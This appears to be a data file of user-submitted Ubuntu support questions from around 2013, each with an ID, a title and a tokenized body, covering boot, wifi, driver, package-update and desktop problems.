372845	ca n't boot freeze at login	i am trying login and my system just freezes . i was messing around with my catalyst driver trying to get my dual 7950s into crossfire mode and it would work..so in my terminal i typed startx and then it locked up . i rebooted my system and now it is frozen after login . how can i repair ?
372849	what does `` $ { debian_chroot : + ( $ debian_chroot ) } '' do in my terminal prompt ?	in my terminal prompt definition in my .bashrc file , among other things , i have this snippet of code : $ { debian_chroot : + ( $ debian_chroot ) } what does this do , and do i need it ?
372851	ever continuing wireless problems 13.10	with each ubuntu upgrade i seem to get new problems with my wireless connection on my hp 6930p laptop . some distributions ago , every time the charger is unplugged , the connection is lost then it reconnects . ditto the other way round - every time i plug it in again , the same happens . this `` bug '' still has n't been fixed as far as i know . it 's very annoying , especially if i 'm downloading something and the cable accidentally falls out . now added to this i have a sleep issue . if i put the laptop to sleep , on waking up the wifi just does not work . i have to go into the terminal and restart the network manager using the command : sudo service network-manager restart that gets the wifi going again ( the same issue of connection lost on unplugging the charger remains though ) , except now i can not put the laptop back to sleep . also the only way i can shut down now , or reboot , is via the terminal as the menu link does n't work . if i select shut down ... or restart ... , the pop-up window appears , but neither of the two buttons work . any pointers or fixes would be most welcome .
372855	boot selection auto come when kept some script on before login startup	i am in ubuntu 12.04 . bios boot selection menu auto comes , when kept some script on start-up before login . adding as per below command . added script in /etc/init.d/ . update-rc.d myscript defaults how to fix this ?
372856	how do keyboard shortcuts work in ubuntu ?	whenever someone launches file manager from launcher /usr/bin/nautilus is executed through nautilus.desktop . now , in nautilus , if the user presses , ctrl+t , a new tab is opened . for this to happen , some file or commands must be executed . where are these files or commands stored ? there are no keyboard-specific executables in usr/bin/ . in short what does os do when some keyboard shortcut is used ?
372858	how to install wifi and bluetooth drivers in ubuntu 12.04 lts	i am using hp pavilion 15 -no11tu which has been awarded the status of enabled for ubuntu . when ubuntu was shipped with my hp laptop , everything worked fine including wifi , webcam and bluetooth . some days ago i formatted my system and reinstalled ubuntu 12.04.3 lts which i downloaded for ubuntu website . but instead of connecting my system to internet and after doing all update and upgrade ubuntu did n't detected my system wifi and bluetooth . hp does not provide driver support for linux . my configuuration : : htcoders @ ubuntu : ~ $ sudo ifconfig eth0 link encap : ethernet hwaddr a4:5d:36:7b : f2 : d7 inet addr:172.16.232.178 bcast:172.16.232.255 mask:255.255.255.0 inet6 addr : fe80 : :a65d:36ff : fe7b : f2d7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:888333 errors:0 dropped:112 overruns:0 frame:0 tx packets:715296 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1156686828 ( 1.1 gb ) tx bytes:51009168 ( 51.0 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:12787 errors:0 dropped:0 overruns:0 frame:0 tx packets:12787 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:800669 ( 800.6 kb ) tx bytes:800669 ( 800.6 kb ) htcoders @ ubuntu : ~ $ lspci 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 00:03.0 audio device : intel corporation device 0a0c ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) 00:1c.1 pci bridge : intel corporation lynx point-lp pci express root port 2 ( rev e4 ) 00:1c.2 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5227 ( rev 01 ) 08:00.0 network controller : mediatek corp. device 7630 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 08 ) please help . thanks
372859	how to separate audio devices	at windows 7 i was able to separate my audio devices . i mean , skype used headphones and music player used speakers . generally , all communicators like skype and ts 3 used headphons and normal voice from websites , system sounds , mucis players was from speakers . how i can do that at linux ?
372861	laptop gets very hot	i have a laptop that has a i5 - 2430m processor with 4gb ram . i installed a ubuntu 13.10 desktop amd64.iso and found that the laptop gets heated up more than usual . should i install a 32 bit os or a 64 bit os ?
372864	why ubuntu uses eglibc instead of glibc ?	i checked for the libc version on my ubuntu 64bit 12.10 machine by issuing the command ldd -- version . i saw that ubuntu uses eglibc instead of glibc . as egiblc is for embedded machines , is there a specific reason why ubuntu uses it instead of the standard glibc .
372865	getting songs from ubuntu one music in flac or ogg	if it is not possible , will ubuntu one ever get around to supporting it ?
372869	how to set grub password	red hat linux has grub-md5-crypt for setting up a grub password . how to do the same in ubuntu 13.10 ?
372875	boot problem update from 12.04 to 12.10 blank screen	i need help http : //paste.ubuntu.com/6380608/ i still have the problem . i just update from 12.04 to 12.10 , and this what happens .
372877	qumi q5 and ubuntu . mirroring via wifi	i have a projector that can work like access point . so i can mirror image from the screen of android or pc to projector . however , it lags . my question is is it possible to connect the projector as a second monitor via wifi ? or i still need a cable ? the aim is to have a laptop in one room and projector in another . sorry for dummy question . : ) i 'm quite new to linux ...
372879	i ca n't do an update	i ca n't do an update or open the ubuntu software center . i get this error message : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/fr.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-fr % 5ffr e : the package lists or status file could not be parsed or opened .
372881	ubuntu package installation - get % progress	i 'm wondering , if there is possible to get percentage progress of package installation ? maybe if you read number of packages that has to be installed and then you have to calculate ... but question now is , how to get number of packages ?
372882	broken gdm in 13.10	i recently switched my 13.10 installation from unity to gnome shell . i did that by installing ubuntu-gnome-desktop . everything is working fine and i 'm using lightdm , but i want to switch to gdm to get the full gnome experience . i ran dpkg-reconfigure gdm , choose gdm and rebooted . ubuntu seemed to boot as usual , but at the end of the boot process all i could see is a black screen . i switched to the terminal and ran service gdm stop and them service lightdm start to make sure lightdm still works , and it does . then i stopped lightdm and ran sudo gdm -- fatal-warnings . this time i could see the cursor and move it , but gdm did not start . i 'll i could find the the syslog was : nov 7 22:42:41 tarsonis gnome-session [ 3055 ] : dconf-critical : unable to op en file '/etc/dconf/db/gdm ' : failed to open file '/etc/dconf/db/gdm ' : open ( ) failed : no such file or directory ; expect degraded performance nov 7 22:42:41 tarsonis gdm-simple-slave [ 2977 ] : failed to give slave prog rams access to the display . trying to proceed . nov 7 22:42:16 tarsonis gdm-simple-slave [ 2209 ] : glib-gobject : g_object_un ref : assertion 'object- > ref_count > 0 ' failed
372885	i cant acces /usr/share/phpmyadmin	i cant acces /usr/share/phpmyadmin after installing phpmyadmin , when i open the phpmyadmin folder the following error is displayed as an alert box.. you do not have the permissions necessary to view the contents of “phpmyadmin” .
372887	ubuntu 13.10 is n't remembering my passwords anymore , why ?	ubuntu 's password management used to be working just fine for me , but around two weeks ago after running apt-get upgrade , i 've noticed that now it keeps `` forgetting '' my passwords . for instance , i need to manually enter passwords to unlock my ssh keys to use git , which previously was done automatically on login . my workplace 's 802.11x authentication also no longer works , i need to manually re-auth just to connect to internet . what 's going on ?
372890	how can i remove/uninstall ubuntu 13.10 to install another linus distro ?	i have ubuntu 13.10 installed in a laptop but don’t feel very happy with it so i want to try other distros . i know i didn’t do it well because i delete windows at the time of the installation , i was really fed up about the slow it was . i didn’t make any partition while installing ubuntu , it is possible to overwrite the other os ? would any remain any rest of ubuntu ? tks
372892	genome-panel top deleted accidentally ubuntu 13.04	one of my friend accidentally deleted gnome-panel top panel . first i tried to restore using gnome-panel -- replace but did not succeeded then i re-install gnome-panel after a clean uninstall but results are same . he is using ubuntu 13.04 ( gnome classic fallback ( no effects ) ) . i saw few old solutions for similar problems , mostly for 10.04 , but those stuffs are of no help . i want to get back the whole panel as it was with all icons and indicators .
372893	how to upgrade gimp version ?	i have gimp 2.8.6 on ubuntu 13.10 and i want to upgrade it to 2.8.8 but i donât know how ? ( if i add the 2.8.8 ppa it wil just upgrade it or it will download whole gimp 2.8.8 ? ) ( i do n't want to waste my internet ! but if it has n't any option to upgrade tell me )
372894	connecting the envelope indicator in panel to my gmail account in 13.10	i have one question . is there a way of connecting the envelope in the upper panel in ubuntu 13.10 , to notify me when i get mail on gmail ? i mean this little thing : http : //i.stack.imgur.com/ly1gt.png thankful in advance ...
372896	screen sometimes inverts after locking	sometimes , when i wake up my computer from a screen lock , one of my screens is inverted . it does not always happen ( maybe one in ten times ) and it is not always the same screen . re-locking and unlocking the screen a couple of times fixes the colors again . i have a dual monitor setup on an ati radeon hd 3450 , using two hp screens connected over dvi . i am using the radeon driver , and according to jockey there are no additional drivers available for my system . any ideas as to why this happens ?
372900	wireless drivers	the results for my laptop are as below . how will i install wireless drivers and graphics ? $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 02:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) $ sudo lshw -c network *-network unclaimed description : network controller product : broadcom corporation vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f0500000-f0507fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 07 serial : 3c:97:0e:85 : c0:0d size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 ip=172.16.96.36 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport:2000 ( size=256 ) memory : f0404000-f0404fff memory : f0400000-f0403fff $ rfkill list all 0 : tpacpi_bluetooth_sw : bluetooth soft blocked : no hard blocked : no
372901	3g dongle and memory card detection	my laptop is an acer v3 -571g . my questions is about 3g dongle ( huawei e1752 ) that i use for my internet on ubuntu 12.04 . the big issue is that ubuntu only recognise the dongle if i plug it in before booting up . but if somehow i loses connection ( due to network being low ) then the only way to use the 3g dongle again is to reboot my machine , which becomes a pain . i have the same issue with the memory card reader of my laptop whereby it only reads when i insert the card before booting up . at first i thought it was an issue that the model was quite new , but i have been updating my ubuntu for a while , and this issue has kept being the same . how to fix this issue ? m
372904	numaric keys not working in ubuntu 12.04 lts	the numeric keys were working , but after i changed some setting in keyboard and mouse section the num pad stopped working . wher i press ctrl+shift and a numaric keys pointers starts to move . please help thank you
372905	installing openswan xl2tpd for ipsec/l2tp vpn	i have a vps hosted with quickweb.co.nz running ubuntu 12.04 openvz . i downloaded and unpacked openswan , but i still can not install : root @ vps : ~/openswan-2.6.35 # apt-get install openswan xl2tpd ppp reading package lists ... done building dependency tree ... done package ppp is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : unable to locate package openswan e : unable to locate package xl2tpd e : package 'ppp ' has no installation candidate i admit to being a novice , i am learning as i go . thanks for your patience and help ! ! : )
372906	installing linux on ocz revodrive3 x2	first of all , here is the configuration of my computer : motherboard : asus h87plus ram : corsair vengeance 32gb processor : intel i7 4770 drive : ocz revodrive 3 x2 ( 240 gb ) ( ocz revodrive3 is a pcie module ) i am trying to install the latest version of ubuntu desktop ( 13.10 ) . the problem is that in the uefi ( bios ) the drive shows up as a 240 gb drive , but in the ubuntu installer it shows up as two 120 gb drives . if i install ubuntu in any of these two drives , it never boots . the screen flickers a few times and comes back to the uefi menu . i have tried reading up and have come across information that the drive has a `` fakeraid '' , and the solution is to use dmraid . however , when i give the following commands in the terminal ( from live cd ) : # modprobe dm_mod # dmraid -ay it says : no raid disks . and the following command : # ls -la /dev/mapper/ just shows /dev/mapper/control how can i install ubuntu on my computer ? what is the correct method ?
372907	install ubuntu 13.10 in dual boot with windows 8.1	i have a laptop with installed windows 8.1 x64 . i want to intstall ubuntu 13.10 ( x64 of cause ) in dual boot with it . i 've made bootable usb stick ( using unetbootin ) with ubuntu and tried to boot with it . it boots fine , and allows me to choose language and asks whether i want to install ubuntu or just boot it . but if i select any ot these options , it shows black screen and hangs . i 've been waiting about 15 minutes for it , but nothing happened . light of usb stick indicates that my laptop was not trying to read from it that time . i switched off efi in bios , switched ahci/sata modes , burned iso image to dvd and still same effect . this topic can be called a duplicated , but i have't find what it duplicates . in other topics people asked what will happen if they update windows 8 to 8.1 having already dual boot and i have installed windows 8.1 and want to install ubuntu alongside with it did i miss something ?
372908	how can i have better sound quality ?	i have been using ubuntu for years now , and the latest ubuntu 13.10 is working perfectly on my n56vz . the image quality is awesome , better than on windows , but there is one thing that is really bugging me and that kills my `` cinema '' experience ... the sound . ubuntu sound quality is n't nearly as good as it does on windows using realtek ( with powerful on the equalizer ) . on ubuntu the sound is like `` faded '' , it is n't as clear as on windows . this happens on the system overall : vlc , youtube , rhythmbox ... i think it is pulse itself that has a horrible sound quality . so , does anyone knows a solution for this ? how can i have better sound quality on ubuntu ?
372909	what is the default ssh password for ubuntu 12.10	honestly , it 's late for me i just want to know the password . i do n't want to set up keys or anything . i understand that it is more secure to have no password and just allow access from certain computers.i just want to find out a way to get the ssh password . i 've just downloaded the sshopen-server . i 've tried my sudo password , but i 'm assuming they are different .
372911	maas/juju architecture and issues	i recently deployed a maas/juju environment based on a six nodes cluster , using ubuntu 12.04 lts , to run a `` proof of concept '' . i could appreciate how interesting the architecture is , and i 'd like to understand if i can really base my future business on this technology . therefore i 'd like to understand more about any involved limitations , constraints and necessities . in particular i 'd like to understand : how can maas be made high availability , i.e . deployed over two or more physical nodes able to fail-over ? can the same physical cluster host multiple juju environments , assuming openstack/virtualization is not used ? can the same physical node host different charms of the same juju environment , deployed in a standard , reliable way by juju ?
372919	nautilus crashes with `` 'g_is_object ( object ) ' failed '' / `` totem-video-thumbnailer could n't open file ''	whenever i open nautilus it crashes and i get this error in terminal . i am running saucy . does anybody know of a different file manger that i can install ? sys:1 : warning : g_object_set : assertion 'g_is_object ( object ) ' failed totem-video-thumbnailer could n't open file 'file : ///home/bruce/new % 20project.ogv' sys:1 : warning : g_object_unref : assertion 'g_is_object ( object ) ' failed segmentation fault ( core dumped )
372920	ubuntu update boot entry	i 'm have ubuntu 13.10 running on my asus laptop . i often check for updates and there are times that ubuntu downloads and installs an entry that is labeled generic . every time this happens , a new grub boot entry is created . my question is , should i change the boot entry to the latest generic or should i leave it to the default 'ubuntu ' entry ?
372926	bash : syntax error near unexpected token ` ( '	i am trying to download flareget download manager via wget i get error wget http : //www.flareget.com/files/flareget/debs/amd64/flareget_2.3-24_amd64 ( stable ) _deb.tar.gz bash : syntax error near unexpected token ` ( ' why is that error coming and what is the solution for that ?
372927	game perfect world not working in wine .	installed ubuntu 13.10 , wine , play on linux . i downloaded arc to install perfect world . arc does install but in login screen to account there is black space where is to be next cancel button , but i enter details and press enter , next screen i can do nothing , even by pressing enter , black is place where to be buttons . to say , when i start arc , buttons next and other stuff arevisible for 1-2 seconds , but dissapear . what to do ? my wife need to play pw , and that was deal if we go to ubuntu from windows like i wanted . help..please
372930	which user agent string does the web browser on mobile devices have	i 'd like to know which user agent string ( ua ) the ubuntu web browser app on mobile devices has , and which implications does that have on existing web sites ? e.g . will most sites behave correctly with it ? is there some kind of fallback ua in case some web sites would n't work with it ?
372934	brief detail on hosts file	can somebody explain what does this mean ? explanation to each line will be helpful . i have mentioned some of my queries in comments too . 127.0.0.1 localhost //according to @ dave , it 's machine ip . 127.0.1.1 dell-inspiron-342 // then what is this ip of ? the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters
372935	undo : sudo update-rc.d -f ondemand remove	as the question says , i issued sudo update-rc.d -f ondemand remove cause that 's what an article on configuring tlp says ... but after doing the `` configurations '' my graphics went back to crap . so i uninstalled tlp re-installed my graphics drivers , but i do n't know how to undo the step described in the title of this question . i read about update-rc.d and i issued sudo update-rc.d -f ondemand defaults mymachine @ deus : ~ $ sudo update-rc.d ondemand defaults [ sudo ] password for mymachine : update-rc.d : warning : ondemand stop runlevel arguments ( 0 1 6 ) do not match lsb default-stop values ( none ) adding system startup for /etc/init.d/ondemand ... /etc/rc0.d/k20ondemand - > ../init.d/ondemand /etc/rc1.d/k20ondemand - > ../init.d/ondemand /etc/rc6.d/k20ondemand - > ../init.d/ondemand /etc/rc2.d/s20ondemand - > ../init.d/ondemand /etc/rc3.d/s20ondemand - > ../init.d/ondemand /etc/rc4.d/s20ondemand - > ../init.d/ondemand /etc/rc5.d/s20ondemand - > ../init.d/ondemand but i 'm not sure if that fixed it , because i do n't really know what i 'm trying to fix ( put back to how it was ) help ? thanks in advance .
372936	update problem in ubuntu 12.04 to the current version	i tried to update ubuntu 12.04.3 lts to the latest version . but i have the following error . santanu @ santanu-compaq-presario-c700-notebook-pc : ~ $ sudo sed -i 's/quantal/raring/ ' /etc/apt/sources.list santanu @ santanu-compaq-presario-c700-notebook-pc : ~ $ sudo apt-get update & & apt-get dist-upgrade e : type 'et/aims/sagemath/ubuntu ' is not known on line 3 in source list /etc/apt/sources.list.d/aims-sagemath-precise.list e : the list of sources could not be read . santanu @ santanu-compaq-presario-c700-notebook-pc : ~ $ cat /etc/apt/sources.list deb cdrom : [ ubuntu 12.04.3 lts precise pangolin - release i386 ( 20130820.1 ) ] / raring main restricted see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ raring main restricted major bug fix updates produced after the final release of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ raring-updates main restricted n.b . software from this repository is entirely unsupported by the ubuntu team . also , please note that software in universe will not receive any review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //us.archive.ubuntu.com/ubuntu/ raring universe deb http : //us.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ raring-updates universe n.b . software from this repository is entirely unsupported by the ubuntu team , and may not be under a free licence . please satisfy yourself as to your rights to use the software . also , please note that software in multiverse will not receive any review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //us.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ raring-updates multiverse n.b . software from this repository may not have been tested as extensively as that contained in the main release , although it includes newer versions of some applications which may provide useful features . also , please note that software in backports will not receive any review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security multiverse uncomment the following two lines to add software from canonical's 'partner ' repository . this software is not part of ubuntu , but is offered by canonical and the respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu raring partner deb-src http : //archive.canonical.com/ubuntu raring partner this software is not part of ubuntu , but is offered by third-party developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main santanu @ santanu-compaq-presario-c700-notebook-pc : ~ $
372937	how to disable automatic copy when selecting text from the keyboard ?	i 've noticed that in ubuntu 13.10 selecting text with the keyboard automatically copies it to the clipboard . i do n't mind this behavior with the mouse so much , but with the keyboard it really drives me nuts . how to disable this ?
372941	gui shutdown on acer aspire v5-573g not working	when i press the gui shutdown button , the system is not powering off , but rather just remains at splash screen . hence , i always have to power off the machine manually holding the power button . issuing shutdown -h or shutdown -p from command line works fine while shutdown -h causes the same problem as the gui shutdown . i use ubuntu 13.10 ( uefi version ) on an acer aspire v5-573g . adding the line `` init_halt = poweroff '' to /etc/default/halt as suggested here does not help . any suggestions are very welcome !
372945	users association/handling for package 's created users group	which is the best way to deal with users in case of new package installation and creation of new users group ? lets suppose printing subsystem was n't installed with ubuntu or some other distribution of linux . later on it was installed and created user group lpadmin . ( i suppose lpadmin installed by printing packages ? ) but at the moment we already can have some desktop users added and should deal with this situation . i currently see next options here : do nothing . let users manually request/perform addition into lpadmin group . automatically add all real users into lpadmin group . automatically add all users with adm group into lpadmin group . if we talking about desktop there is no reason not to include at least admin users inside lpadmin . i just wondering which way is preferred for ubuntu . i do n't think it 's a good idea to bring additional hustle on desktop users after just another packet setup . some times i suppose permissions must be granted by default . what do you think ?
372946	i need acpi=off to boot , but this seems to disable wifi	to boot my computer , i have to use acpi=off in kernel options . doing this apparently causes my wifi adapter to be switched off and prevents my mouse and usb keyboard to not work . if i change acpi=off to nomodeset , it fixes these problems . but then it sets my computer at a lower resolution . i am currently running kubuntu 13.10 , although none of the updates , starting from 12.04 , changed the need for acpi=off . i assume i need acpi=off in because i have an oldish computer with an intel motherboard how can i boot without acpi=off ? output of uname -a : 3.11.0-13-generic # 20-ubuntu smp wed oct 23 07:38:26 utc x86_64 x86_64 x86_64 gnu/linux
372950	phpmyadmin not working , browser shows a blankpage	i would like to access phpmyadmin . i have access it before but , now , i 'm just getting a blank page and i really do n't know why . how to set permission for /var/www/phpmyadmin ? is it necessary for working ?
372951	how to install ubuntu on macbook pro as dual boot ?	i want to install ubuntu 13.10 in my macbookpro . i am running mountain lion in my mac . i want to run both mountain lion and ubuntu 13.10 in my mac . how to install ubuntu in my macbook without affecting existing data and os with dual boot feature ?
372953	ubuntu/winboot/wubildr.mbr missing or contains errors	i installed ubuntu 12.04 version using wubi when my laptop was running windows 7 which i upgraded to windows 8.1 preview . everything was working well until i upgraded again to windows 8.1 retail when it was released a few weeks ago . after selecting ubuntu during boot option , boot manager showed the below error message . the os could n't be loaded because the file \ubuntu\winboot\wubildr.mbr is missing or contains error i have tried the boot-repair option twice now and chkdsk /r /f /x ( every option that is supposed to fix errors ) but to no avail . please help me because my thesis is on there and stupidly enough , nowhere else . here is the link from my boot-repair procedure . http : //paste.ubuntu.com/6380961/ how to fix this ?
372954	can not establish wired connection on acer aspire 5930g	i use an acer aspire 5930g , dual booted with windows 7 and ubuntu 13.10 . my problem is that i can not establish wired connection on my ubuntu . wireless connection works in both of my oss but the wired connection does not , only on the ubuntu . i have already tried the common fix : echo on | sudo tee /sys/class/net/eth0/device/power/control but without any results . any ideas ? eth0 link encap : ethernet hwaddr 00:1d:72 : c2:21 : a5 inet6 addr : fe80 : :21d:72ff : fec2:21a5/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:945 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:204318 ( 204.3 kb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:7241 errors:0 dropped:0 overruns:0 frame:0 tx packets:7241 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:645874 ( 645.8 kb ) tx bytes:645874 ( 645.8 kb ) wlan0 link encap : ethernet hwaddr 00:16 : ea:57:7b : cc inet addr:192.168.2.2 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :216 : eaff : fe57:7bcc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:19937 errors:0 dropped:0 overruns:0 frame:0 tx packets:16933 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:10877245 ( 10.8 mb ) tx bytes:3131378 ( 3.1 mb ) 02:00.0 ethernet controller : marvell technology group ltd. 88e8071 pci-e gigabit ethernet controller ( rev 16 )
372955	boot problems in install	i had windows 8 running on my computer and decided that i wanted to swith over to using ubuntu . i used my usb drive and downloaded the 13.10 edition . the . i used the pendrivelinux software from the site to put the ubuntu install onto the usb drive to make it bootable . then i turned off my computer and rebooted it with the usb drive . i went through the installation steps and installed it and made an ubuntu one account . then it prompted me to restart my computer . i restarted it with the flash drive still in and it rebooted to the same installation page that 's black . so i turned off and turned on my computer without the flash drive plugged in and it did n't boot it just said start pxe over ipv4 . i waited a while and i got a no operating system message . can someone please help me figure out this problem and how i can get the os up and running ?
372961	how to pay to ubuntu by master card	in my country iraq , there 's just master card available to pay . so its possible to pay with it to ubuntu or the lonely way is by paypal . thanks
372963	why does update-notifier contains system-crash-notification ?	i just had `` system program problem detected '' window appearing several times before user session even started ( i have kdm with autologin to locked session ) . i traced it with xprop to being /usr/lib/update-notifier/system-crash-notification which is binary ( while i expected it to be some script ) and belongs to update-notifier package ( while i expected it to be somewhere from apport* ) . p.s . clicking on report problem ... button did n't do anything . $ dpkg -s update-notifier | grep version version : 0.147 $ dpkg -l update-notifier | grep system-crash /usr/lib/update-notifier/system-crash-notification $ grep release /etc/lsb-release distrib_release=13.10 the same question on lp : https : //answers.launchpad.net/ubuntu/+source/update-notifier/+question/239040
372965	ad not from this site	i am having a problem when i am browsing the web on ubuntu 13.10 . whenever i browse , i start seeing ads with it saying ads not from this site ! ! ! search on google and it will say it 's adware ! how do i get rid of it ? my browser is google chrome 30.0.1599.114 ( official build 229842 ) , and a screenshot is :
372966	make bootable disk/usb in ubuntu 13.10 of windows iso	i 'm using ubuntu 13.10 but i want to install windows so , i downloaded a windows iso but how to make bootable disk/usb in ubuntu 13.10 of windows iso
372969	canon mp600 usb-connected scanner is not recognized by sane-find-scanner	i have a canon pixma mp600 , which is supported by xsane with pixma backend . i have xubuntu 12.04 , this is the result of sudo sane-find-scanner -v command : searching for usb scanners : checking /dev/usb/scanner ... failed to open ( invalid argument ) checking /dev/usb/scanner0 ... failed to open ( invalid argument ) and so on . checking /dev/usbscanner ... failed to open ( invalid argument ) checking /dev/usbscanner0 ... failed to open ( invalid argument ) and so on . no usb scanners found . it works on my laptop with ubuntu 12.04 . how to fix this ?
372970	13.10 does n't boot on vaio pro 13	i just installed ubuntu 13.10 on my new vaio pro 13 , disabled safe mode , but used uefi and not legacy mode . i did an encrypted lvm installation and erased the complete ssd . it booted just fine from usb , but after installation it does n't boot . the vaio failed boot screen appears . i then tried this advice here : 13.10 on vaio pro with uefi sadly it fails for me with '' /usr/sbin/grub-probe : error : failed to get canonical path of /cow . '' i then tried mounted the encrypted partition with nautilus and tried this : can not update grub with paramters on live usb with /dev/sda2 and then to install grub to /dev/sda . did n't succeed and warned me that the '' gpt partition label contains no bios boot partition ; embedding won't be possible '' what do i have to do , go fix grub and be able to boot my finished install ? here 's my boot repair log : http : //paste.ubuntu.com/6386598/ i would really appreciate any help , i 'm so happy to finally be able to ditch my big fat macbook pro and use ubuntu on my new , light vaio pro , if only i could fix grub . best , x
372973	problems with gdm , sometimes not loading gnome shell	my current problem is quite hard to investigate , at least for me . thing is that when i start my hp g72 notebook it boots ok , hp logo appears and dissapears and then , it depends , sometimes it shows gnome loading screen or screen just remains blank . as i recall , before i changed lightdm to gdm it never occured , at least not that often .
372977	how to kill the x server and end up with a cli ?	is it possible to kill the gui and end up with a cli since the gui runs on the top of the shell ? i have check the question below how to kill and to start the x server ? magic keys restarted the gui and i ended up with the login menu but not a cli i am using ubuntu 12.04 , i dont want to use virtual terminal i just want to prove to myself that the gui runs on top of the shell and i can always exit the gui to the shell thanks
